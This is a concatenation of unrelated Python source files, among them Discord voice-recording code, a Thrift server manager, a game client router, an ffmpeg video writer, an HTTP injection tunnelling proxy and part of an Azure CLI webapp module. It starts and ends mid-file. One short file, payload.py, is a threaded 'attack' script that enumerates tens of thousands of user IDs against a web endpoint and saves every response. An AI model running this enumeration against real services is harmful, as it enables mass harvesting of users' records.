Opus. Raises ------- ClientException You are not connected. opus.OpusError Encoding the data failed. """ self.checked_add('sequence', 1, 65535) if encode: encoded_data = self.encoder.encode(data, self.encoder.SAMPLES_PER_FRAME) else: encoded_data = data packet = self._get_voice_packet(encoded_data) try: self.socket.sendto(packet, (self.endpoint_ip, self.voice_port)) except BlockingIOError: log.warning('A packet has been dropped (seq: %s, timestamp: %s)', self.sequence, self.timestamp) self.checked_add('timestamp', opus.Encoder.SAMPLES_PER_FRAME, 4294967295) def unpack_audio(self, data): """Takes an audio packet received from Discord and decodes it into pcm audio data. If there are no users talking the channel, `None` will be returned You must be connected to receive audio. Parameters --------- data: :class:`bytes` Bytes received by Discord via the UDP connection used for sending and receiving voice data """ if 200 <= data[1] <= 204: # RTCP received. # RTCP provides information about the connection # as opposed to actual audio data, so it's not # important at the moment. return if self.paused: return data = RawData(data, self) if data.decrypted_data == b'\xf8\xff\xfe': # Frame of silence return self.decoder.decode(data) def start_recording(self, sink, callback, *args): """The bot will begin recording audio from the current voice channel it is in. This function uses a thread so the current code line will not be stopped. Must be in a voice channel to use. Must not be already recording. Parameters ---------- sink: :class:`Sink` A Sink which will "store" all the audio data callback: :class:`asynchronous function` A function which is called after the bot has stopped recording. *args: Args which will be passed to the callback function. Raises ------ ClientException Not connected to a voice channel. ClientException Already recording. ClientException Must provide a Sink object. """ if not self.is_connected(): raise ClientException('Not connected to voice channel.') if self.recording: raise ClientException("Already recording.") if not isinstance(sink, Sink): raise ClientException("Must provide a Sink object.") self.empty_socket() self.decoder = opus.DecodeManager(self) self.decoder.start() self.recording = True self.sink = sink sink.init(self) t = threading.Thread(target=self.recv_audio, args=(sink, callback, *args,)) t.start() def stop_recording(self): """Stops the recording. Must be already recording. Raises ------ ClientException Not currently recording. """ if not self.recording: raise ClientException("Not currently recording audio.") self.decoder.stop() self.recording = False self.paused = False def pause_recording(self): """Pauses or unpauses the recording. Must be already recording. Raises ------ ClientException Not currently recording. """ if not self.recording: raise ClientException("Not currently recording audio.") self.paused = {True: False, False: True}[self.paused] def empty_socket(self): while True: ready, _, _ = select.select([self.socket], [], [], 0.0) if len(ready) == 0: break for s in ready: s.recv(4096) def recv_audio(self, sink, callback, *args): # Gets data from _recv_audio and sorts # it by user, handles pcm files and # silence that should be added. self.user_timestamps = {} self.starting_time = time.perf_counter() while self.recording: ready, _, err = select.select([self.socket], [], [self.socket], 0.01) if not ready: if err: print("Socket error") continue try: data = self.socket.recv(4096) except OSError: self.stop_recording() continue self.unpack_audio(data) self.stopping_time = time.perf_counter() self.sink.cleanup() try: callback = asyncio.run_coroutine_threadsafe(callback(self.sink, *args), self.loop) result = callback.result() except Exception as exc: raise exc else: if result is not None: print(result) def ssrc_exists(self, ssrc): return ssrc in self.ws.ssrc_map def recv_decoded_audio(self, data): if data.ssrc not in self.user_timestamps: self.user_timestamps.update({data.ssrc: data.timestamp}) # Add silence of when they were not being recorded. #data.decoded_data = struct.pack('<h', 0) * round(self.decoder.CHANNELS * self.decoder.SAMPLING_RATE * (time.perf_counter() - self.starting_time)) + data.decoded_data else: self.user_timestamps[data.ssrc] = data.timestamp silence = data.timestamp - self.user_timestamps[data.ssrc] - 960 data.decoded_data = struct.pack('<h', 0) * silence + data.decoded_data #if not self.ssrc_exists(data.ssrc): # threading.Condition().wait_for(lambda: self.ssrc_exists(data.ssrc)) while not self.ssrc_exists(data.ssrc): time.sleep(0.2) self.sink.write(data.decoded_data, self.ws.ssrc_map[data.ssrc]['user_id'])
tieraServerManager.py
import commands import threading import socket import time import sys import json import select sys.path.append('./gen-py') from WieraTieraServerIface import * from WieraTieraServerIface.ttypes import * from thrift.transport import TSocket from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol from thrift.server import TServer from TieraServerWieraIface import * from TieraServerWieraIface.ttypes import * class DCsMonitor: #this info will come from Tiera Server #this moudle will agreegate information which will be used for PGA #this will be updsed by Tiera Server update_thread = None def __init__(self, tiera_server_manager): self.tiera_server_manager = tiera_server_manager self.update_thread = threading.Thread(target=self._update, args=[5, ]) self.update_thread.daemon = True self.update_thread.start() def _update(self, ping_interval): while True: server_list = self.tiera_server_manager.get_tiera_server_list() for server_info in server_list: hostname = server_info[0] tiera_server_client, port = self.tiera_server_manager.get_tiera_server_client(hostname, 0) # print tiera_server_client try: if tiera_server_client != None: piggy_back_info = tiera_server_client.ping() req_json = json.loads(piggy_back_info) # print req_json #update info self.tiera_server_manager.update_server_info(hostname, port, req_json) except Exception, e: print 'TSM: Ping to Tiera Server ' + hostname + ':' + str(port) + ' has been failed.' self.remove_tiera_server(hostname, port) time.sleep(ping_interval) outdated_server_list = self.tiera_server_manager.check_latest_updated_time() # if len(outdated_server_list) > 0: # print 'TSM: These servers are outdated :' + str(outdated_server_list) class WieraTieraServerHandler: def __init__(self, tiera_server_manager): self.tiera_server_manager = tiera_server_manager def registerTieraServer(self, server_info, callback_ip): tiera_info = json.loads(server_info) result = {} try: self.tiera_server_manager.lock.acquire() if tiera_info != None: hostname = tiera_info['hostname'] if 'ip' not in tiera_info: ip = callback_ip.strip('::ffff:') print ip + ' from callback_ip from thrift' else: ip = tiera_info['ip'] port = tiera_info['tiera_server_port'] self.tiera_server_manager.add_tiera_server(hostname, ip, port) result['result'] = True result['value'] = 'Add Tiera info into the list successfully' print '[TSM] '+ hostname + '(' + ip + ':' + str(port) +') is registered.' else: result['result'] = False result['value'] = 'Failed to load request to json' finally: self.tiera_server_manager.lock.release() return json.dumps(result) class TieraServerManager: def __init__(self, port, ping_interval): self.server_list = {} self.wiera_server_manager_port = port self.lock = threading.Lock() #run server for Tiera Server # self.wiera_tiera_server = threading.Thread(target=self._run_tiera_server, args=([port,])) # self.wiera_tiera_server.daemon = True # self.wiera_tiera_server.start() self.ping_interval = ping_interval #set ping thread # self.DCsMonitor = DCsMonitor(self) def add_tiera_server(self, hostname, ip, port): if hostname not in self.server_list: self.server_list[hostname] = {} self.server_list[hostname]['ip'] = ip self.server_list[hostname]['ports'] = {} if port in self.server_list[hostname]['ports']: self.server_list[hostname]['ports'][port].close() transport = TSocket.TSocket(ip, port) transport = TTransport.TFramedTransport(transport) protocol = TBinaryProtocol.TBinaryProtocol(transport) client = TieraServerWieraIface.Client(protocol) # Connect! transport.open() self.server_list[hostname]['ports'][port] = {} self.server_list[hostname]['ports'][port]['update_time'] = time.time() self.server_list[hostname]['ports'][port]['thrift_client'] = client self.server_list[hostname]['ports'][port]['aggregated'] = {} # self.server_list[hostname]['ports'][port]['aggregated']['latency'] = {} # self.server_list[hostname]['ports'][port]['aggregated']['bandwidth'] = {} #will store get and put history and latency for each request # self.server_list[hostname]['ports'][port]['aggregated']['workload'] = {} def get_tiera_server_client(self, hostname, port): if hostname in self.server_list: if port in self.server_list[hostname]['ports']: return (self.server_list[hostname]['ports'][port]['thrift_client'], port) else: for port in self.server_list[hostname]['ports']: return (self.server_list[hostname]['ports'][port]['thrift_client'], port) return None def run_forever(self): # set handler to our implementation handler = WieraTieraServerHandler(self) processor = WieraTieraServerIface.Processor(handler) transport = TSocket.TServerSocket(port=self.wiera_server_manager_port) tfactory = TTransport.TFramedTransportFactory() pfactory = TBinaryProtocol.TBinaryProtocolFactory() # set server server = TServer.TThreadPoolServer(processor, transport, tfactory, pfactory, daemon=True) #set socket thread 20 min server.setNumThreads(32) print '[TSM] Tiera Server Manager is ready for Tiera Server port:' + str(self.wiera_server_manager_port) server.serve() def check_latest_updated_time(self): outdated_server = [] for hostname in self.server_list: for port in self.server_list[hostname]['ports']: latest = self.server_list[hostname]['ports'][port]['update_time'] elapse = time.time() - latest if elapse > self.ping_interval+1: outdated_server.append((hostname, port)) return outdated_server def update_server_info(self, hostname, port, server_info): self.server_list[hostname]['ports'][port]['aggregated'] = server_info self.server_list[hostname]['ports'][port]['update_time'] = time.time() def find_info_by_hostname(self, hostname): if hostname in self.server_list: ip = self.server_list[hostname]['ip'] for port in self.server_list[hostname]['ports']: return ip, port return None, None def remove_tiera_server(self, hostname, port): if port in self.server_list[hostname]['ports']: del self.server_list[hostname]['ports'][port] def get_tiera_server_list(self): #return as a list server_list = [] for hostname in self.server_list: ip = self.server_list[hostname]['ip'] server_info = (hostname, ip) server_list.append(server_info) return server_list def get_tiera_server(self, hostname): if hostname not in self.server_list: return None return self.server_list[hostname]
client_manager.py
from LURKconfig import game_settings from client import Client, Q from LURKp import LURKprot from models import Session, Player, Character, Room, Connection from math import ceil import threading, time import multiprocessing.dummy as mp class ClientManager: ### Uses a threaded loop to relay messages between Clients ### def __init__(self): self.game_settings = game_settings self.lurk = LURKprot() self.players = {} # TODO: won't track players, only new conns until they start in their own process. self.router_queue = mp.Queue() self.thread = threading.Thread(target = self.message_loop) self.thread.start() def route_message(self, message): name, message_dict = message if name in self.players: self.players[name].send_queue.put(message_dict) else: print(f'Player Route Error: {name} not found') def message_loop(self): while True: message = self.router_queue.get() self.route_message(message) def greet_conn(self, conn): lurk_version = self.lurk.get_version_message() self.lurk.encode(lurk_version, conn = conn) greeting = self.lurk.get_game_message(self.game_settings['initial_points'], self.game_settings['stat_limit'], self.game_settings['greeting']) self.lurk.encode(greeting, conn = conn) def spawn_client(self, conn, router_queue, character): send_queue = Q() p = mp.Process(target = Client, args = (conn, router_queue, send_queue, character)) p.start() return send_queue def approve_conn(self, conn): ### Checks availability of name or innactive Player object, creates/updates Player or responds with error message ### message_dict = self.lurk.decode(conn = conn) if message_dict and 'type' in message_dict and message_dict['type'] == 10: name = message_dict['name'] # print(f'Approval pending for: {name}') stats_total = message_dict['attack'] + message_dict['defense'] + message_dict['regen'] if stats_total == self.game_settings['initial_points']: # TODO: This block should be moved into Game if name in self.players: print("Attempting to resurrect") if self.resurrect_player(conn, message_dict): self.players[name] = self.spawn_client(conn, self.router_queue, message_dict) return True else: print(f'Adding new player: {name}') self.players[name] = self.spawn_client(conn, self.router_queue, message_dict) # self.game_queue.put((name, message_dict)) return True else: print(f"Rejecting character stats for {name}") text = f"Attack, defense, and regen must total {self.game_settings['initial_points']}" error_message = self.lurk.get_err_message(4, text = text) self.lurk.encode(error_message, conn = conn) return False def resurrect_player(self, conn, character_dict): name = character_dict['name'] try: self.players[name].conn.send(bytes(1)) # attempt writing to the socket to see if it's alive except: print('Found existing player with broken conn, replacing conn...') self.players[name].new_thread(conn) return True print("Rejecting new conn") error_message = self.lurk.get_err_message(2) self.lurk.encode(error_message, conn = conn) return False def add_player(self, action): ### Checks availability of name or innactive Player object, creates/updates Player or responds with error message ### name, character_dict = action print(f'Adding character: {name}') with Session() as s: player = s.query(Character).filter_by(name = name).first() if player: self.players[name].alive = True self.players[name].set_flags(character_dict['flags']) self.players[name].health = 100 else: self.players[name] = Character(character_dict = character_dict) #Player(self, conn, character_dict = character_dict) accept_message = self.lurk.get_accept_message(10) self.client_queue.put((name, accept_message)) approved_character = self.lurk.get_char_message(self.players[name].get_dict()) self.client_queue.put((name, approved_character))
utils.py
import os from glob import glob from subprocess import Popen, PIPE from datetime import datetime from threading import Thread from notifications import send_sms def delete_files(): """Remove files matching OUTPUT_FILE_PREFIX""" files = glob(os.environ['OUTPUT_FILE_PREFIX'] + '*') for f in files: os.remove(f) class VideoWriter(object): def __init__(self, *args, **kwargs): self.ffmpeg_process = None def initialize_ffmpeg(self): """Create a process to run ffmpeg""" self.video_filename = '{}_{}.mp4'.format( os.environ['OUTPUT_FILE_PREFIX'], datetime.now().strftime('%Y-%m-%d-%H-%M-%s') ) self.ffmpeg_process = Popen([ 'ffmpeg', '-y', '-f', 'image2pipe', '-vcodec', 'mjpeg', '-r', '24', '-i', '-', '-vcodec', 'mpeg4', '-q', '5', '-fs', '590000', '-r', '24', self.video_filename ], stdin=PIPE, stdout=PIPE) def start_recording(self, frame): """Write image frame to stdin of subprocess""" if not self.ffmpeg_process: self.initialize_ffmpeg() try: # write the frame to ffmpeg process' stdin self.ffmpeg_process.stdin.write(frame) self.ffmpeg_process.stdin.flush() except BrokenPipeError: self.finish_recording() def finish_recording(self): """Close subprocess stdin""" if self.ffmpeg_process and not self.ffmpeg_process.stdin.closed: self.ffmpeg_process.stdin.close() self.ffmpeg_process = None Thread(target=send_sms, args=(self.video_filename,)).start()
main.py
#qpy:console import sys import time import random import threading import ServerInfo import ServerConfig import ServerPinger import ServerHandler ru = lambda text: text.decode('utf-8', 'ignore') class Server: def __init__(self): self.long = 8 self.sets = ServerConfig.Sets() self.name = ServerInfo.Info('name').get_info() self.ver = ServerInfo.Info('ver').get_info() self.form = ServerInfo.Info('about').get_info() self.auth = ServerInfo.Info('by').get_info() self.mail = ServerInfo.Info('mail').get_info() self.remode = ServerInfo.Info('remode').get_info() self.conf = ServerConfig.conf self.noyes = [ru('No'), ru('Yes')] self.version = [ru('Default'), ru('HTTP/1.0'), ru('HTTP/1.1')] self.method = [ru('HEAD'), ru('GET'), ru('POST'), ru('DELETE'), ru('CONNECT'), ru('OPTIONS'), ru('TRACE'), ru('PUT')] self.line = [ru('\\r\\n'), ru('\\n')] self.split = [ru('Default'), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE))] def subs(self, data = '', cut = False): if data: data = data else: data = 'None' if cut: if len(data) > 5: data = '%s...' % data[:5] return data def about(self, title = ''): self.info = [] self.info.append('[ %s ]%s\n' % (title, '=' * (self.long - len(title) - 5))) self.info.append('Name : %s\n' % self.name) self.info.append('Version : %s\n' % self.ver) self.info.append('Dev : %s\n' % self.auth) self.info.append('Email : %s\n' % self.mail) self.info.append('Remode : %s\n' % self.remode) self.info.append('\n\n') return ru(''.join(self.info)) def config(self, title = ''): self.info = [] self.info.append('[ %s ]%s\n' % (title, '=' * (self.long - len(title) - 5))) self.info.append('Config File :\n') self.info.append('- %s\n' % self.conf) self.info.append('Local Host :\n') self.info.append('- %s\n' % self.sets.LHOST) self.info.append('Local Port :\n') self.info.append('- %s\n' % str(self.sets.LPORT)) self.info.append('HTTP Query :\n') self.info.append('- Front Query : %s\n' % self.subs(self.sets.FQUERY)) self.info.append('- Middle Query : %s\n' % self.subs(self.sets.MQUERY)) self.info.append('- Back Query : %s\n' % self.subs(self.sets.BQUERY)) self.info.append('- Reverse Query : %s\n' % self.subs(self.sets.RQUERY)) self.info.append('- Inject Query : %s\n' % self.subs(self.sets.IQUERY)) self.info.append('- Inject Method : %s\n' % self.method[self.sets.IMETHOD]) self.info.append('- Inject Newline : %s\n' % self.line[self.sets.ILINE]) self.info.append('- Inject Splitline : %s\n' % self.split[self.sets.ISPLIT]) self.info.append('- Remove Port : %s\n' % self.noyes[self.sets.RPORT]) self.info.append('- Remove Path : %s\n' % self.noyes[self.sets.RPATH]) self.info.append('- Url Replacer : %s\n' % self.subs(self.sets.CQUERY)) self.info.append('- Request Version : %s\n' % self.version[self.sets.RHTTP]) self.info.append('- Advanced Mode : %s\n' % self.noyes[self.sets.ADMODE]) self.info.append('HTTP Header :\n') self.info.append('- Custom Header 1 : %s\n' % self.subs(self.sets.CUSHDR0)) self.info.append('- Header Value 1 : %s\n' % self.subs(self.sets.VALHDR0)) self.info.append('- Custom Header 2 : %s\n' % self.subs(self.sets.CUSHDR1)) self.info.append('- Header Value 2 : %s\n' % self.subs(self.sets.VALHDR1)) self.info.append('- Custom Header 3 : %s\n' % self.subs(self.sets.CUSHDR2)) self.info.append('- Header Value 3 : %s\n' % self.subs(self.sets.VALHDR2)) self.info.append('- Custom Header 4 : %s\n' % self.subs(self.sets.CUSHDR3)) self.info.append('- Header Value 4 : %s\n' % self.subs(self.sets.VALHDR3)) self.info.append('Server Config :\n') self.info.append('- Keep Server : %s\n' % self.subs(self.sets.KEEP)) self.info.append('- HTTPS Connection : %s\n' % self.noyes[self.sets.RHTTPS]) self.info.append('- Tunnel Proxy : %s\n' % self.noyes[self.sets.PTYPE]) self.info.append('- Server Buffer : %s\n' % str(self.sets.SBUFF)) self.info.append('- Connection Timeout : %s\n' % str(self.sets.TIMEOUT)) self.info.append('Proxy Host :\n') self.info.append('- %s\n' % self.subs(self.sets.PHOST)) self.info.append('Proxy Port :\n') self.info.append('- %s\n' % str(self.sets.PPORT)) self.info.append('\n\n') return ru(''.join(self.info)) def log(self, title = ''): self.info = [] self.info.append(' %s %s\n' % (title, '' * (self.long - len(title) - 5))) self.info.append('\n\n') return ru(''.join(self.info)) def show(self): sys.stderr.write(self.about('About')) time.sleep(1) sys.stderr.write(self.config('Configuration')) time.sleep(2) sys.stderr.write(self.log('========Inject Sukses======== \nReading Server:')) def run(self): ServerHandler.LogWindow(True) ServerHandler.HTTPProxyService().serve_forever() def pinger(self): while 1: time.sleep(random.randint(30, 300)) ServerPinger.Pinger().check() if __name__ == '__main__': Server().show() services = [threading.Thread(target=Server().run, args=()), threading.Thread(target=Server().pinger, args=())] for serving in services: serving.start()
payload.py
import threading, requests END_NUM = 79800 URL = "" def attack(x, y): filename = str(x) + "to" + str(y) + ".txt" for i in range(x, y): PARAMS = {'UserID': i} r = requests.get(url=URL, params=PARAMS) if(len(r.text) == 90): while(len(r.text)== 90): r = requests.get(url=URL, params=PARAMS) print("Retrying ID : ", i) f = open(filename, "a+") f.write(r.text) f.close() if __name__ == "__main__": threads = [] for i in range(0, END_NUM, 1000): t = threading.Thread(target=attack, args=((1 if i == 0 else i), (i + 1000))) threads.append(t) t.start() for t in threads: t.join()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import ast import threading import time from urllib.parse import urlparse from urllib.request import urlopen from binascii import hexlify from os import urandom import datetime import json import ssl import sys import uuid from functools import reduce import invoke from nacl import encoding, public import OpenSSL.crypto from fabric import Connection from knack.prompting import prompt_pass, NoTTYException, prompt_y_n from knack.util import CLIError from knack.log import get_logger from msrestazure.azure_exceptions import CloudError from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id from azure.mgmt.storage import StorageManagementClient from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient from azure.mgmt.relay.models import AccessRights from azure.mgmt.web.models import KeyInfo from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory from azure.cli.command_modules.network._client_factory import network_client_factory from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.commands import LongRunningOperation from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \ ConfiguredDefaultSetter, sdk_no_wait, get_file_json from azure.cli.core.util import get_az_user_agent, send_raw_request from azure.cli.core.profiles import ResourceType, get_sdk from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError, CLIInternalError, UnclassifiedUserFault, AzureResponseError, AzureInternalError, ArgumentUsageError) from .tunnel import TunnelServer from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory from ._appservice_utils import _generic_site_operation, _generic_settings_operation from .utils import (_normalize_sku, get_sku_name, retryable_method, raise_missing_token_suggestion, _get_location_from_resource_group, _list_app, _rename_server_farm_props, _get_location_from_webapp, _normalize_location, get_pool_manager) from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details, check_resource_group_exists, set_location, get_site_availability, get_profile_username, get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use, detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name) from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD, LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH) from ._github_oauth import (get_github_access_token) logger = get_logger(__name__) # pylint:disable=no-member,too-many-lines,too-many-locals # region "Common routines shared with quick-start extensions." # Please maintain compatibility in both interfaces and functionalities" def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None, multicontainer_config_type=None, multicontainer_config_file=None, tags=None, using_webapp_up=False, language=None, assign_identities=None, role='Contributor', scope=None, vnet=None, subnet=None): from azure.mgmt.web.models import Site SiteConfig, SkuDescription, NameValuePair = cmd.get_models( 'SiteConfig', 'SkuDescription', 'NameValuePair') if deployment_source_url and deployment_local_git: raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git') docker_registry_server_url = parse_docker_image_name(deployment_container_image_name) client = web_client_factory(cmd.cli_ctx) if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name) if not plan_info: raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name)) is_linux = plan_info.reserved node_default_version = NODE_EXACT_VERSION_DEFAULT location = plan_info.location # This is to keep the existing appsettings for a newly created webapp on existing webapp name. name_validation = get_site_availability(cmd, name) if not name_validation.name_available: if name_validation.reason == 'Invalid': raise CLIError(name_validation.message) logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that " "the app is a part of the current subscription".format(name)) current_rg = app_details.resource_group if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()): raise CLIError("The webapp '{}' exists in resource group '{}' and does not " "match the value entered '{}'. Please re-run command with the " "correct parameters.". format(name, current_rg, resource_group_name)) existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings') settings = [] for k, v in existing_app_settings.properties.items(): settings.append(NameValuePair(name=k, value=v)) site_config = SiteConfig(app_settings=settings) else: site_config = SiteConfig(app_settings=[]) if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1', 'B1', 'B2', 'B3', 'BASIC']: site_config.always_on = True if subnet or vnet: subnet_info = _get_subnet_info(cmd=cmd, resource_group_name=resource_group_name, subnet=subnet, vnet=vnet) _validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location, subnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"]) _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"], vnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"], subnet_name=subnet_info["subnet_name"]) site_config.vnet_route_all_enabled = True subnet_resource_id = subnet_info["subnet_resource_id"] else: subnet_resource_id = None webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags, https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id) helper = _StackRuntimeHelper(cmd, client, linux=is_linux) if runtime: runtime = helper.remove_delimiters(runtime) current_stack = None if is_linux: if not validate_container_app_create_options(runtime, deployment_container_image_name, multicontainer_config_type, multicontainer_config_file): raise CLIError("usage error: --runtime | --deployment-container-image-name |" " --multicontainer-config-type TYPE --multicontainer-config-file FILE") if startup_file: site_config.app_command_line = startup_file if runtime: match = helper.resolve(runtime) if not match: raise CLIError("Linux Runtime '{}' is not supported." " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime)) match['setter'](cmd=cmd, stack=match, site_config=site_config) elif deployment_container_image_name: site_config.linux_fx_version = _format_fx_version(deployment_container_image_name) if name_validation.name_available: site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE", value="false")) elif multicontainer_config_type and multicontainer_config_file: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) elif plan_info.is_xenon: # windows container webapp if deployment_container_image_name: site_config.windows_fx_version = _format_fx_version(deployment_container_image_name) # set the needed app settings for container image validation if name_validation.name_available: site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME", value=docker_registry_server_user)) site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD", value=docker_registry_server_password)) site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL", value=docker_registry_server_url)) elif runtime: # windows webapp with runtime specified if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]): raise CLIError("usage error: --startup-file or --deployment-container-image-name or " "--multicontainer-config-type and --multicontainer-config-file is " "only appliable on linux webapp") match = helper.resolve(runtime) if not match: raise CLIError("Windows runtime '{}' is not supported. " "Please invoke 'az webapp list-runtimes' to cross check".format(runtime)) match['setter'](cmd=cmd, stack=match, site_config=site_config) # TODO: Ask Calvin the purpose of this - seems like unneeded set of calls # portal uses the current_stack propety in metadata to display stack for windows apps current_stack = get_current_stack_from_runtime(runtime) else: # windows webapp without runtime specified if name_validation.name_available: # If creating new webapp site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION", value=node_default_version)) if site_config.app_settings: for setting in site_config.app_settings: logger.info('Will set appsetting %s', setting) if using_webapp_up: # when the routine is invoked as a help method for webapp up if name_validation.name_available: logger.info("will set appsetting for enabling build") site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True)) if language is not None and language.lower() == 'dotnetcore': if name_validation.name_available: site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK', value='https://{}.scm.azurewebsites.net/detectors' .format(name))) poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def) webapp = LongRunningOperation(cmd.cli_ctx)(poller) # TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed if current_stack: _update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack) # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name) if deployment_container_image_name: logger.info("Updating container settings") update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password=docker_registry_server_password) if assign_identities is not None: identity = assign_identity(cmd, resource_group_name, name, assign_identities, role, None, scope) webapp.identity = identity return webapp def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location): vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks vnet_location = vnet_client.get(resource_group_name=subnet_resource_group, virtual_network_name=vnet_name).location vnet_location = _normalize_location(cmd, vnet_location) asp_location = _normalize_location(cmd, webapp_location) if vnet_location != asp_location: raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. " "vnet location: {}. Plan location: {}.".format(vnet_location, asp_location)) def _get_subnet_info(cmd, resource_group_name, vnet, subnet): from azure.cli.core.commands.client_factory import get_subscription_id subnet_info = {"vnet_name": None, "subnet_name": None, "resource_group_name": None, "subnet_resource_id": None, "subnet_subscription_id": None, "vnet_resource_id": None} if is_valid_resource_id(subnet): if vnet: logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.") parsed_sub_rid = parse_resource_id(subnet) subnet_info["vnet_name"] = parsed_sub_rid["name"] subnet_info["subnet_name"] = parsed_sub_rid["resource_name"] subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"] subnet_info["subnet_resource_id"] = subnet subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"] vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}" subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"], parsed_sub_rid["resource_group"], parsed_sub_rid["name"]) return subnet_info subnet_name = subnet if is_valid_resource_id(vnet): parsed_vnet = parse_resource_id(vnet) subnet_rg = parsed_vnet["resource_group"] vnet_name = parsed_vnet["name"] subscription_id = parsed_vnet["subscription"] subnet_info["vnet_resource_id"] = vnet else: logger.warning("Assuming subnet resource group is the same as webapp. " "Use a resource ID for --subnet or --vnet to use a different resource group.") subnet_rg = resource_group_name vnet_name = vnet subscription_id = get_subscription_id(cmd.cli_ctx) vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}" subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id, subnet_rg, vnet) subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}" subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name) subnet_info["vnet_name"] = vnet_name subnet_info["subnet_name"] = subnet_name subnet_info["resource_group_name"] = subnet_rg subnet_info["subnet_resource_id"] = subnet_rid subnet_info["subnet_subscription_id"] = subscription_id return subnet_info def validate_container_app_create_options(runtime=None, deployment_container_image_name=None, multicontainer_config_type=None, multicontainer_config_file=None): if bool(multicontainer_config_type) != bool(multicontainer_config_file): return False opts = [runtime, deployment_container_image_name, multicontainer_config_type] return len([x for x in opts if x]) == 1 # you can only specify one out the combinations def parse_docker_image_name(deployment_container_image_name): if not deployment_container_image_name: return None non_url = "/" not in deployment_container_image_name non_url = non_url or ("." not in deployment_container_image_name and ":" not in 